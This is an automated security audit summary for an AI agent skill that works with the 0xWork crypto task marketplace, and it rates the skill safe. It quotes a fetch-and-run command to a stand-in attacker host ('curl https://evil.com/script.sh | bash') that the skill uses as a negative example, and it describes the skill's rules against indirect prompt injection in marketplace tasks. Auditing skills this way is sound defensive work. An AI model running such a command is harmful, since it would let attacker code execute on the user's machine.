0xwork
Pass
Audited by Gen Agent Trust Hub on Mar 27, 2026
Risk Level: SAFE
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains a reference to a malicious shell pipe command (
curl https://evil.com/script.sh | bash). Analysis confirms this is part of the "Security: Untrusted Content Handling" section, where it serves as a negative example to teach the agent to identify and reject malicious payloads in task descriptions. It is not an instruction for the agent to execute code. - [PROMPT_INJECTION]: Includes a robust defense framework against indirect prompt injection. It defines strict trust boundaries, categorizing marketplace content as untrusted and providing non-negotiable rules for the agent to ignore any financial or system-level instructions embedded in tasks.
- [EXTERNAL_DOWNLOADS]: The skill instructs the installation of the
@0xwork/clipackage from the public NPM registry. This is the official tool provided by the vendor (bankrbot) for marketplace interactions. - [CREDENTIALS_UNSAFE]: Defines credentials for wallet interaction (
BANKR_API_KEY,PRIVATE_KEY). The skill adheres to security best practices by recommending remote signing via Bankr (avoiding private keys on disk) and using environment variables for storage. - [COMMAND_EXECUTION]: Utilizes a command-line interface (
0xwork) to perform marketplace operations such as task discovery, claiming, and deliverable submission. All commands are scoped to the primary functionality of the 0xWork platform.
Audit Metadata